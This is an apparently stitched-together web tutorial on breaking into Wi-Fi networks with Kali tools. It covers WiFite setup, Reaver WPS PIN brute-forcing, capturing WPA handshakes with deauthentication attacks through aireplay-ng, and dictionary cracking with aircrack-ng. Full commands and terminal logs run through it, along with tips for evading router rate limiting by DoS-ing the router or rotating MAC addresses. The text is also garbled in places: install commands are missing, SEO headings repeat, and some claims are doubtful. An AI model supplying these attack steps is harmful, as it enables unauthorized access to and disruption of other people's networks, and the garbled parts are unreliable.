Kali Wifite Handshake Location

To attack multiple WEP, WPA, and WPS encrypted networks in a row. This tool is customizable to be automated with only a few arguments.

Previously, Kali Linux was introduced to you. It contains a large amount of Penetration Testing Tools. Today you will learn about one other tool of this collection. WiFite is a Penetration Testing Tool under the GNU General Public License version 2 and in this article, we will present How To Install And Run Wifite On Kali Linux. You can customize WiFite to be automated with only a few arguments and attack multiple Wired Equivalent Privacy, Wi-Fi Protected Access, and Wi-Fi Protected Setup encrypted networks in a row. It has been designed to use all these recent methods for retrieving the password of a wireless access router. Once you start running WiFite, you can select your targets, and then it will start capturing or cracking the password. You do not need to memorize command arguments and switches anymore, WiFite will run the existing wireless-auditing tools for you. You can find your preferred Linux VPS packages and continue learning how to use this tool on your own server.

  • This is a text file including a list of possible passwords; you can find them with a simple google search, and kali Linux has a few (usr/share/wordlists/rockyou.txt). Once you have downloaded a dictionary file, open up a terminal and enter “aircrack-ng -b bssid of router -w path to word list path of captured handshake”. If the password is in the dictionary file, aircrack-ng will tell you.
  • Pyrit allows you to create databases of pre-computed WPA/WPA2-PSK PMKs. By using Multi-Core CPUs and ATI-Stream,Nvidia CUDA, and OpenCL, it is a powerful attack against one of the world's most used security-protocols.

Tutorial Install WiFite On Kali Linux

WiFite Features

1- WiFite is able to crack the closest access points due to their signal strength first while it sorts targets in dB.

2- De-authenticates clients of hidden networks automatically to reveal SSIDs.

3- It has so many filters to specify what to attack exactly.

4- Timeouts, packets/sec, and other settings are customizable.

5- WiFite can change MAC to a random address before the attack as an anonymous feature. When attacks are complete, change back.

6- It provides the backup of all captured WPA to wifite.py’s current directory.

7- It cycles between all clients and broadcast deauths as a smart WPA de-authentication.

8- You can easily stop the attacks with Ctrl+C and move onto the next target with options to continue or even skip to cracking and exit.

9- You can view the summary of the session at the exit and see the cracked keys.

10- You will find all saved passwords to cracked.txt

11- The built-in updater is available on ./wifite.py-upgrade

Recommended Article: How To Install And Use Yersinia On Kali Linux

Required Tools

1- A wireless card with the ”Monitoring Mode” ability and packet injection.

2- The latest versions of some programs are supported which should be installed to let WiFite work well such as python, iwconfig, ifconfig, Aircrack-ng, airmon-ng, aircrack-ng, aireplay-ng, airodump-ng, packetforge-ng.

Kali Wifite

3- The suite of programs it uses, forces WiFite to be run as root. While it is not a good idea to run downloaded scripts as root, you can use the Kali Linux bootable Live SC, a bootable USB stick, or a virtual machine. In case you use a virtual machine you need to prepare a wireless USB dongle since they cannot access hardware directly.

Learn Install And Run WiFite On Kali Linux Step By Step

WiFite is designed for the latest version of Kali Linux. If you are using the latest version of the required tools, WiFite can support other pen-testing distributions like BackBox or Ubuntu Server. Now that you got familiar with WiFite enough, it is time to see how easy is to install it on Kali Linux.

How to Install WiFite On Kali Linux

Run the following command to install WiFite:

It will install the WiFite and all packages.

Also, you can install WiFite onto your computer (from any terminal) by running:

Kali Wifite Handshake Location

In this way, you have installed wifite to /user/bin/wifite which is in your terminal path.

Use the commands below to install dependencies:

How To Run WiFite On Kali Linux

Type the following command to run WiFite:

Screenshots

1- Cracking WPS PIN using reaver ‘s Pixie-Dust attack, then fetching WPA key using bully

2- Cracking WPA key using PMKID attack

3- Decloaking and cracking a hidden access point

4- Cracking a weak WEP password

5- Cracking a pre-captured handshake using John The Ripper

Recommended Article: How To Install And Run WiFite On Kali Linux

How To Uninstall WiFite From Kali Linux

If you decide to uninstall WiFite, you need to record the files which you have installed by the above command in the installing part and remove those files:

If you wish to use pip install instead of python setup.py install, remove all files and undo any other stuff that installation did manually. But if you do not know the list of all files, record a list of installed files. Type the command below to do this:

And then, use xargs to do the removal when you want to uninstall:

That’s that! By reaching this point you have read a brief introduction to WiFite, the way of installing, running, and remove it. Feel free to buy your preferred VPS and then we are beside you to learn how to install and configure Kali Linux on it.

Conclusion

In this article, you learned How To Install And Run WiFite On Kali Linux. In February 2011, the New York Times called the WiFite as the ”New Hacking Tools Pose Bigger Threats to Wi-Fi users”. Now fewer bugs are being detected as well as it does not leave processes running in the background while it was an issue in the previous versions. Enjoy the speed and accuracy of this tool and reach your considered purposes. In case you are interested in reading more, find our related article on How To Install Nishang On Kali Linux.

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Hack WPA/WPA2 WPS

When it was known that a WEP network could be hacked by any kid with a laptop and a network connection (using easy peasy tutorials like those on our blog), the security guys did succeed in making a much more robust security measure WPA/WPA2.

Now hacking WPA/WPA2 is a very tedious job in most cases. A dictionary attack may take days, and still might not succeed. Also, good dictionaries are huge.

An exhaustive bruteforce including all the alphabets (uppercase lowercase) and numbers, may take years, depending on password length. Rainbow tables are known to speed things up, by completing a part of the guessing job beforehand, but the output rainbow table that needs to be downloaded from the net is disastrously large (can be 100s of GBs sometimes). And finally the security folks were at peace. But it was not over yet, as the new WPA technology was not at all easy for the users to configure. With this in mind, a new security measure was introduced to compliment WPA. Wifi Protected Setup (WPS). Now basically it was meant to make WPA even tougher to crack, and much easier to configure (push a button on router and device connects). However, it had a hole, which is now well known, and tools like reaver can exploit it in a single line statement. It still might take hours, but it is much better than the previous scenario in which months of brute-forcing would yield no result:

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Here's what wikipedia says about WPS

Created by the Wi-Fi Alliance and introduced in 2006, the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the available security options to set up Wi-Fi Protected Access, as well as making it easy to add new devices to an existing network without entering long pass phrases. Prior to the standard, several competing solutions were developed by different vendors to address the same need. A major security flaw was revealed in December 2011 that affects wireless routers with the WPS feature, which most recent models have enabled by default. The flaw allows a remote attacker to recover the WPS PIN in a few hours with a brute-force attack and, with the WPS PIN, the network's WPA/WPA2 pre-shared key. Users have been urged to turn off the WPS feature, although this may not be possible on some router models.

Working Of WPS

Now while most of the things are the same as in WPA, there is a new concept of using pins for authentication. So basically, the client sends 8 digit pins to the access point, which verifies it and then allows the client to connect. Now a pin has 8 digits, and only contains numbers, so its a possible target for bruteforece. Under normal bruteforcing of WPA passwords, you have to consider the fact that there may be number, alphabets, and sometimes symbols (and more than 8 letters). This make the task a billion billion times tougher. However, we can try thousands of keys per second, which make it a tad bit easier. Now in WPS, there is a delay because we have to wait for APs response, and we may only try a few keys per second (practically the best I've seen on my PC is 1 key per 2 sec). Basically, 8 digits and 10 possibilities per digit (0-9) make it 10^8 (interpret ^ as raised to the power of)seconds if we assume one key per second. Now that'll be years. So, where is this taking us? The answer is, there are flaws in this technology that can be used against it.

• The 8th digit is a checksum of first 7 digits. 10^7 possibilities, i.e. one-tenth time. Two months, still a way to go.

• The pin number for verification goes in two halves, so we can independently verify the first four and the last four digits. Its easy to guess 4 digits correct two times, than to guess 8 correct digits at once. Basically, the first half would take 10^4 guess and the second would take 10^3.

Now the guesses would be 10^4 + 10^3 (not 10^4 *10 ^3). Now we need 11,000 guesses:


So that'll take 3 hours approximately. And that's all the combinations, and most probably the correct pin will not be the last combination, so you can expect to reach the result earlier. However, the assumption is that bruteforcing will take place at a key per second. My personal best is a key every 2 seconds, and yours might drop to as low as a key every 10 seconds.

How to carry out the attack
Now it might have been tough to carry out this attack at some point in history, but now, its a breeze. If you have all the prerequisites, then hacking the network would be as easy as:
reaver -i <interface-name> -b <BSSID of target>

And if you are already familiar with hacking WEP, then just go to your Kali Linux terminal and type the above command (replacing what needs to be replaced). Leave your machine as is, come back 10 mins later, check the progress (must be 1% or something), and go take a nap. However, if you're a newbie, then tag along.

Kali Linux


First o ff, you need to have Kali linux (or backtrack) up and running on your machine. Any other Linux distro might work, but you'll need to install Reaver on your own. Now if you don't have Kali Linux installed, you might want to go to this page, which will get you

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started on hacking with Kali Linux. (Reaver has a known issue : Sometimes it doesn't work with Virtual Machines, and you might have to do a live boot using live CD or live USB of Kali Linux.

Information Gathering
Now you need to find out the following about you target network
• Does it have WPS enabled. If not, then the attack will not work.
• The BSSID of the network.

Now to check whether the network has WPS enabled or not, you can either use wash or just use the good old airodump-ng. Wash is specifically meant to check whether a network has WPS enabled or not, and thereby is much easier to use. Here are the steps:

• Set your wireless interface in monitor mode.
airmon-ng start wlan0
• Use wash (easy but sometimes unable to detect networks even when they have wps enabled). If any network shows up there, it has WPS enabled:
wash -i mon0


This is an error which I haven't figured out yet. If you see it, then you'll have to do some homework, or move on to airodump method. Update: wash -i mon0 --ignore-fcs might solves the issue.

• Use airodump-ng. It will show all networks around you. It tells which of them use WPA. You'll have to assume they have WPS, and then move to next steps:
airodump-ng mon0


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BSSID of the network: now irrespective of what you used, you should have a BSSID column in the result that you get. Copy the BSSID of the network you want to hack. That's all the information you need.

So by now you must have something like XX:XX:XX:XX:XX:XX, which is the BSSID of your target network. Keep this copied, as you'll need it.
Reaver
Now finally we are going to use Reaver to get the password of the WPA/WPA2 network. Reaver makes hacking very easy, and all you need to do is enter
reaver -i mon0 -b XX:XX:XX:XX:XX:XX

Explanation = i (interface used). Remember creating a monitor interface mon0 using airmon-ng start wlan0. This is what we are using -b species the BSSID of the network that we found out earlier.

This is all the information that Reaver needs to get started. However, Reaver comes with many advanced options, and some are recommended by me. Most importantly, you should use the -vv option, which increases the verbosity of the tool. Basically, it writes everything thats going on to the terminal. This helps you see whats happening, track the progress, and if needed, do some troubleshooting. So final command should be

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv
After some hours, you will see something like this. The pin in this case was intentionally 12345670, so it was hacked in 3 seconds.
WPA PSK : X
X is the password of the wireless network.
Here is an extra section, which might prove useful.


WPA PSK : X
X is the password of the wireless network.
Here is an extra section, which might prove useful. Known problems that are faced... troubleshooting:

1 As in the screenshot above, you saw the first line read 'Switching wlan0 to channel 6'. (Yours will be mon0 instead of wlan0). Sometimes, it keeps switching interfaces forever.

2 Sometimes it never gets a beacon frame, and gets stuck in the waiting for beacon frame stage.
3 Sometimes it never associates with the target AP.
4 Sometimes the response is too slow, or never comes, and a (0x02) or something error is displayed.
In most cases, such errors suggest:
1 Something wrong with wireless card.
2 AP is very choosy, won't let you associate.
3 The AP does not use WPS.
4 You are very far from the AP.
5 Rate Limiting implemented in the router (most new router have this)
Possible workarounds:
1 Sometimes, killing naughty processes helps. (see pictures below)
2 Move closer to target AP

3 Do a fakeauth using aireplay-ng (check speeding up WEP hacking) and tell Reaver not to bother as we are already associated using -A (just add -A at the end of your normal reaver code)

4 If you are using Kali Linux in Vmware, try booting into Kali using USB. I don't know why, but sometimes internal adapters work wonders, and can't be used from inside of a VM. In my case, booting up from USB and using internal adapter increased the signal strength and speeded up the bruteforce process. Update : It has nothing to do with internal adapter. I have verified this with many others, and it is now a known problem with Reaver. It does not work well inside Virtual machines. It is recommended that you do a live boot.

5 As far as rate limiting is concerned, there are few workarounds available in forums across the web, but nothing seems to work with 100% certainty. Here is a relevant discussion of gitlab, here is a solution on hack5 forums which has a script and uses mdk5 tool (sometimes it doesn't work, it's supposed to DOS the router and reset the ban temporarily), and here is a thread on Kali Forums on the same issue, which has various possible solutions listed (including a method which changes your MAC address regularly [sorry if the download link on the thread there doesn't work] and hence allows reaver to work against routers which lock the particular MAC address which is attacking them and don't lock down completely).

6 Update: For some people the reason Reaver is not working is because the version of Libpcap you are using is not compatible with the version of Kali you are using.
A lot of people have shared their experiences in the comments section. Help out if you can, seek help if you need any. I can't always respond, but someone usually does.
Even after all your attempts, if you can't get it to work, then the AP just isn't vulnerable.
You have the following alternatives:

A If you were following the tutorials one by one in the order shown in the top navigation bar (Hack With Kali -> Wireless Hacking), then you have learnt all you needed in this chapter (even if you failed to get WPA-PSK), and can move to the next ones.

B See if you can hack a WPA network.


Hack WPA/WPA2 PSK Capturing the Handshake

WPA password hacking
Hacking WPA-2 PSK involves 2 main steps:
1 Getting a handshake (it contains the hash of password, i.e. encrypted password)
2 Cracking the hash.

Now the first step is conceptually easy. What you need is you, the attacker, a client who'll connect to the wireless network, and the wireless access point. What happens is when the client and access point communicate in order to authenticate the client, they have a 4 way handshake that we can capture. This handshake has the hash of the password. Now there's no direct way of getting the password out of the hash, and thus hashing is a robust protection method. But there is one thing we can do. We can take all possible passwords that can exists, and convert them to hash. Then we'll match the hash we created with the one that's there in the handshake. Now if the hashes match, we know what plain text password gave rise to the hash, thus we know the password. If the process sounds really time consuming to you, then its because it is. WPA hacking (and hash cracking in general) is pretty resource intensive and time taking process. Now there are various different ways cracking of WPA can be done. But since WPA is a long shot, we shall first look at the process of capturing a handshake. We will also see what problems one can face during the process. Also, before that, please check some optional wikipedia theory on what a 4-way handshake really is.

The Four-Way Handshake

The authentication process leaves two considerations: the access point (AP) still needs to authenticate itself to the client station (STA), and keys to encrypt the traffic need to be derived. The earlier EAP exchange or WPA2-PSK has provided the shared secret key PMK (Pairwise Master Key). This key is, however, designed to last the entire session and should be exposed as little as possible. Therefore the four-way handshake is used to establish another key called the PTK (Pairwise Transient Key). The PTK is generated by concatenating the following attributes: PMK, AP nonce (ANonce), STA nonce (SNonce), AP MAC address, and STA MAC address. The product is then put through PBKDF2-SHA1 as the cryptographic hash function.

The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast and broadcast traffic. The actual messages exchanged during the handshake are depicted in the figure and explained below:

1 The APsends a nonce-value to the STA (ANonce). The client now has all the attributes to construct the PTK.

2 The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including authentication, which is really a Message Authentication and Integrity Code: (MAIC).

3 The AP sends the GTK and a sequence number together with another MIC. This sequence number will be used in the next multicast or broadcast frame, so that the receiving STA can perform basic replay detection.
4 The STA sends a confirmation to the AP.

All the above messages are sent as EAPOL-Key frames.
As soon as the PTK is obtained it is divided into five separate keys:
PTK (Pairwise Transient Key – 64 bytes)
1 16 bytes of EAPOL-Key Confirmation Key (KCK)– Used to compute MIC on WPA EAPOL Key message
2 16 bytes of EAPOL-Key Encryption Key (KEK) - AP uses this key to encrypt additional data sent (in the 'Key Data' field) to the client (for example, the RSN IE or the GTK)
3 16 bytes of Temporal Key (TK) – Used to encrypt/decrypt Unicast data packets
4 8 bytes of Michael MIC Authenticator Tx Key – Used to compute MIC on unicast data packets transmitted by the AP
5 8 bytes of Michael MIC Authenticator Rx Key – Used to compute MIC on unicast data packets transmitted by the station
The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used if the network is using TKIP to encrypt the data.
By the way, if you didn't understand much of it then don't worry. There's a reason why people don't search for hacking tutorials on Wikipedia (half the stuff goes above the head)
Capturing The Handshake
Now there are several (only 2 listed here) ways of capturing the handshake. We'll look at them one by one
1 Wifite (easy and automatic)


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2 Airodump-ng (easy but not automatic, you manually have to do what wifite did on its own)
Wifite
Methodology

We'll go with the easy one first. Now you need to realize that for a handshake to be captured, there has to be a handshake in place happening. Now there are 2 options, you could either sit there and wait till a new client shows up and connects to the WPA network, or you can force the already connected clients to disconnect, and when they connect back, you capture their handshake. Your network card is good at receiving packets, but not as good in creating them. Now if your clients are very far from you, your deauth requests (i.e. please get off this connection request) won't reach them, and you'll keep wondering why you aren't getting any handshake (the same kind of problem is faced during ARP injection and other kind of attacks too). So, the idea is to be as close to the access point (router) and the clients as possible. Now the methodology is same for wifite and airodump-ng method, but wifite does all this crap for you, and in case of airodump-ng, you'll have to call a brethren (airreply-ng) to your rescue. Okay enough theory.

Get the handshake with Wifite

Now my configuration here is quite simple. I have my cellphone creating a wireless network named 'me' protected with wpa-2. Now currently no one is connected to the network. Lets try and see what wifite can do.

Kali Wifite Handshake Location List

root@kali:~# wifite
.;' `;,
.;' ,;' `;, `;, WiFite v2 (r85)
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: automated wireless auditor
':. ':. ':. /_ ,:' ,:' ,:'
':. ':. /___ ,:' ,:' designed for Linux
':. /_____ ,:'
/
[+] scanning for wireless devices...
[+] enabling monitor mode on wlan0... done
[+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
[0:00:04] scanning wireless networks. 0 targets and 0 clients found
[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
NUM ESSID CH ENCR POWER WPS? CLIENT
--- ------------------- - --- ---- --- -----
1 me 1 WPA2 57db wps
2 ******* 11 WEP 21db no client
3 ************** 11 WEP 21db no


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Now as you can see, my network showed up as 'me'. I pressed ctrl+c and wifite asked me which target to attack (the network has wps enabled. This is an added bonus, reaver can save you from all the trouble. Also, wifite will use reaver too to skip the whole WPA cracking process and use a WPS flaw instead. We have a tutorial on hacking WPA WPS using Reaver already, in this tutorial we'll forget that this network has WPS and capture the handshake instead).

[+] select target numbers (1-3) separated by commas, or 'all':

Now I selected the first target, i.e. me. As expected, it had two attacks in store for us. First it tried the PIN guessing attack. It has almost 100% success rate, and would have given us the password had I waited for 2-3 hours. But I pressed ctrl+c and it tried to capture the handshake. I waited for 10-20 secs, and then pressd ctrl+c. No client was there so no handshake could be captured. Here's what happened.

[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:24] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on 'me'
[0:08:05] listening for handshake...
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] disabling monitor mode on mon0... done [+] quitting

Now I connected my other PC to 'me'. Lets do it again. This time a client will show up, and wifite will de-authenticate it, and it'll try to connect again. Lets see what happens this time around.

NUM ESSID CH ENCR POWER WPS? CLIENT
--- ------------------- - --- ---- --- -----
1 * 1 WPA 99db no client
2 me 1 WPA2 47db wps client
3 * 11 WEP 22db no clients
4 * 11 WEP 20db no
[+] select target numbers (1-4) separated by commas, or 'all': 2
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:07] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on 'me'
[0:07:51] listening for handshake...
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:


[+] 0/2 WPA attacks succeeded
[+] quitting
Now the deauth attacks weren't working. This time I increased the deauth frequency.
root@kali:~# wifite -wpadt 1

Soon, however, I realized, that the problem was that I was using my internal card (Kali Live USB). It does not support packet injection, so deauth wasn't working. So time to bring my external card to the scene.

root@kali:~# wifite
.;' `;,
.;' ,;' `;, `;, WiFite v2 (r85)
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: automated wireless auditor
':. ':. ':. /_ ,:' ,:' ,:'
':. ':. /___ ,:' ,:' designed for Linux
':. /_____ ,:'
/
[+] scanning for wireless devices...
[+] available wireless devices:


1. wlan1 Ralink RT2870/3070 rt2800usb - [phy1]
2. wlan0 Atheros ath9k - [phy0]
[+] select number of device to put into monitor mode (1-2):
See, we can use the USB card now. This will solve the problems for us.
Now look at wifite output
NUM ESSID CH ENCR POWER WPS? CLIENT
--- ------------------- - --- ---- --- -----
1 me 1 WPA2 44db wps client
2 * 11 WEP 16db no client
3 * 11 WEP 16db no
[+] select target numbers (1-3) separated by commas, or 'all':
Now I attack the target. This time, finally, I captured a handshake.
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:01] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on 'me'
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[0:07:23] listening for handshake...
[0:00:57] handshake captured! saved as 'hs/me_02-73-8D-**-**-**.cap'
[+] 2 attacks completed:
[+] 1/2 WPA attacks succeeded
me (02:73:8D:37:A7:ED) handshake captured
saved as hs/me_02-73-8D-**-**-**.cap
[+] starting WPA cracker on 1 handshake
[!] no WPA dictionary found! use -dict <file> command-line argument
[+] disabling monitor mode on mon0... done

[+] quitting

As you can see, it took me 57 seconds to capture the handshake (5 deauth requests were sent, one every 10 secs is default). The no dictionary error shouldn't bother you. We'll use Wifite only to capture the handshake. Now the captured handshake was saved as a .cap file which can be cracked using aircrack, pyrit, hashcat (after converting .hccap), etc. using either a wordlist or bruteforce. Let's see how to do the same thing with airodump-ng. This time I won't show you the problems you might run into. It'll be a perfect ride, all the problems were seen in wifite case.

Capturing Handshake with Airodump-ng
1. Find out the name of your wireless adapter:

Kali wifite handshake location

Kali Wifite Handshake Location Code


Kali Wifite Handshake Locations

Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know:

Trouble with the wlan interface not showing up. This is because virtual machines can't use internal wireless cards and you will have to use external cards. You should try booting Kali using Live USB (just look at the first part of this tutorial), or buy an external card. 2. Enable Monitor mode

Now, we use a tool called airmon-ng to create a virtual interface called mon. Just type
airmon-ng start wlan0
Your mon0 interface will be created.
3. Start capturing packets
Now, we'll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You'll see the name of the wifi you want to hack.
airodump-ng mon0


4. Store the captured packets in a file
This can be achieved by giving some more parameters with the airodump command
airodump-ng mon0 --write name_of_file

Non newbies:
root@kali:~# airmon-ng start wlan1
root@kali:~# airodump-ng mon0 -w anynamehere

Now copy the bssid field of your target network (from airodump-ng ng screen)and launch a deauth attack with aireplay-ng:
root@kali:~# aireplay-ng --deauth 0 -a BSSID here mon0

Kali Wifite Handshake Location Map

The --deauth tells aireplay to launch a deauth attack. 0 tell it to fire it at interval of 0 secs (very fast so run it only for a few secs and press ctrl+c). -a will required BSSID and replace BSSID here with your target BSSID. mon0 is the interface you created.

In case you face problems with the monitor mode hopping from one channel to another, or problem with beacon frame, then fix mon0 on a channel using:
root@kali:~# airodump-ng mon0 -w anynamehere -c 1

Replace 1 with the channel where your target AP is. You might also need to add --ignorenegative-one if aireplay demands it. In my case airodump-ng says fixed channel mon0: -1 so this was required. (It's a bug with aircrack-ng suite).

Now when you look at the airodump-ng screen, you'll see that at the top right it says WPA handshake captured . Here is what it looks like
CH 1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: **
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:73:8D:37:A7:ED -47 75 201 35 0 1 54e WPA2 CCMP PSK me
BSSID STATION PWR Rate Lost Frames Probe
* * 0 0e- 1 742 82 me
* * -35 0e- 1 0 26
You can confirm it by typing the following:
root@kali:~# aircrack-ng anynamehere-01.cap
Opening anynamehere-01.cap
Read 212 packets.
# BSSID ESSID Encryption
1 ************** me WPA (1 handshake) 2 ** Unknown